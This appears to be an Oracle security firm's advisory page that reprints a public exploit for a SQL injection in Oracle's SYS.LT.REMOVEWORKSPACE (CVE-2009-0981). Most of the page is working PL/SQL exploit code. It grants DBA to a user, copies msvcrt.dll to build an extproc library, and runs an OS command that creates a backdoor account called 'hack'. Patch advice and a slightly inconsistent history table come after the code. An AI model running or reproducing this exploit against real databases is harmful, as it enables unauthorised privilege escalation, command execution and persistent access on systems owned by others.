Oracle 10g SYS.LT.REMOVEWORKSPACE SQL Injection Exploit

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap

Name	Oracle 10g SYS.LT.REMOVEWORKSPACE SQL Injection Exploit
Systems Affected	Oracle Database Server versions 9iR2, 10gR1, 10gR2 and 11gR1
Severity	High Risk
Category	Escalate User Privileges
Vendor URL	http://www.oracle.com/
Credit	Esteban Martinez Fayo
Exploit	http://www.milw0rm.com
Date	06 Jan 2009

Details
The REMOVEWORKSPACE procedure is owned by SYS or by WMSYS (depending on the Oracle version), one user can call this procedure with malicious code and execute
PL/SQL statements and elevate the privileges as the user were the package owner.

Example
/*********************************************************/
/*Oracle 10g SYS.LT.REMOVEWORKSPACE SQL Injection Exploit*/
/****grant DBA and create new OS user (advanced extproc)*/
/*********************************************************/
/***********exploit grant DBA to scott********************/
/***********and execute OS command "net user"*************/
/***********using advanced extproc method*****************/
/*********************************************************/
/***********tested on oracle 10.1.0.5.0*******************/
/*********************************************************/
/*********************************************************/
/* Date of Public EXPLOIT: January 6, 2009 */
/* Written by: Alexandr "Sh2kerr" Polyakov */
/* email: Alexandr.Polyakov@dsec.ru */
/* site: http://www.dsecrg.ru */
/* http://www.dsec.ru */
/*********************************************************/
/*Original Advisory: */
/*Esteban Martinez Fayo [Team SHATTER ] */
/*Date of Public Advisory: November 11, 2008 */
/*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/
/*********************************************************/

select * from user_role_privs;

CREATE OR REPLACE FUNCTION X return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
EXECUTE IMMEDIATE 'GRANT CREATE ANY DIRECTORY TO SCOTT';
EXECUTE IMMEDIATE 'GRANT CREATE ANY LIBRARY TO SCOTT';
EXECUTE IMMEDIATE 'GRANT EXECUTE ON SYS.DBMS_FILE_TRANSFER TO SCOTT';
COMMIT;
RETURN 'X';
END;
/

exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.X()=''X');
exec SYS.LT.REMOVEWORKSPACE('sh2kerr'' and SCOTT.X()=''X');

/* bypassing extproc limitation by copying msvcrt.dll to $ORACLE_HOME\BIN */
/* this method works in 10g and 11g database versions with updates */

CREATE OR REPLACE DIRECTORY copy_dll_from AS 'C:\Windows\system32';
CREATE OR REPLACE DIRECTORY copy_dll_to AS 'C:\Oracle\product\10.1.0\db_1\BIN';

BEGIN
SYS.DBMS_FILE_TRANSFER.COPY_FILE(
source_directory_object => 'copy_dll_from',
source_file_name => 'msvcrt.dll',
destination_directory_object => 'copy_dll_to',
destination_file_name => 'msvcrt.dll');
END;
/

CREATE OR REPLACE LIBRARY extproc_shell AS 'C:\Oracle\product\10.1.0\db_1\bin\msvcrt.dll';
/

CREATE OR REPLACE PROCEDURE extprocexec (cmdstring IN CHAR)
IS EXTERNAL
NAME "system"
LIBRARY extproc_shell
LANGUAGE C;
/

/* here we can paste any OS command for example create new user */

EXEC extprocexec('net user hack 12345 /add');
/

select * from user_role_privs;

Patch Information
Apply the latest Oracle Security patches (e.g. CPU April 2009 )

History
13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Advisory published

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.